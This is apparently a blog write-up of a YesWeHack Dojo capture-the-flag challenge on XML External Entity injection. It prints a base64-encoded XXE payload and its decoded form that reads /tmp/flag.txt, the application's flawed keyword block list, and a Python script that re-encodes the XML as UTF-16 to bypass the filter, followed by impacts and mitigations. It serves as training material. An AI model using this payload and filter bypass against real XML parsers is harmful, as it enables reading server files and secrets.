Featured image of post [YesWeHack] - Dojo 34
Bug Bounty

[YesWeHack] - Dojo 34

πŸ“œ Description

XXE (XML External Entity) attacks are a type of injection attack in which an attacker attempts to exploit a vulnerability in an application that parses XML input. This vulnerability can allow an attacker to inject malicious code into the XML input, which is then executed by the application.

πŸ•΅οΈ Proof of Conceptt

In your application, XXE attack occurs when we inject in the input POST parameter : /v8APAA/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA/AD4APAAhAEQATwBDAFQAWQBQAEUAIAByAG8AbwB0ACAAWwA8ACEARQBOAFQASQBUAFkAIAB0AGUAcwB0ACAAUwBZAFMAVABFAE0AIAAnAGYAaQBsAGUAOgAvAC8ALwB0AG0AcAAvAGYAbABhAGcALgB0AHgAdAAnAD4AXQA+ADwAcgBvAG8AdAA+ACYAdABlAHMAdAA7ADwALwByAG8AbwB0AD4=

Decoded the payload is as follow :

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]>&test;

The vulnerability come from the bypass of restriction in the application code :

1
2
3
4

if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):
        #Allow parsing for casual svg
        if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
            return 'BLOCKED'

If we inject an XML encoded in UTF-16, wich start with b’\xff\xfe’, we can bypass the filters restriction and access the file in /tmp/flag.txt. Bellow the script to convert the xml file.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

#input_file = <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>
with open(input_file, 'r', encoding='utf-8') as f:
        utf8_data = f.read()

    # Convert in UTF-16BE
    utf16be_data = utf8_data.encode('utf-16-be')

    # Add Header UTF-16BE
    utf16be_data_with_header = b'\xfe\xff' + utf16be_data

    # Encode in Base64
    base64_data = base64.b64encode(utf16be_data_with_header)

As shown in the image below, it is possible to access the /tmp/flag.txt file :

🚧 Impacts

XXE attacks can be used to access sensitive information from the application or from the server on which it is running. For example, an attacker might use an XXE attack to read sensitive files from the file system, send HTTP requests to other servers, or even execute commands on the server.

πŸ” Mitigations

XXE vulnerabilities can occur when an application processes XML input without properly validating or sanitizing it. This can allow an attacker to inject malicious code into the XML input, which is then executed by the application.

To prevent XXE attacks, it is important to properly validate and sanitize all XML input to ensure that it does not contain any malicious code. This can be done using techniques such as input validation, input sanitization, and input whitelisting. It is also important to keep the application and its dependencies up to date to ensure that any known vulnerabilities are patched.

πŸ“š References PortSwigger - XML external entity (XXE) CWE-611: Improper Restriction of XML External Entity Reference

Licensed under CC BY-NC-SA 4.0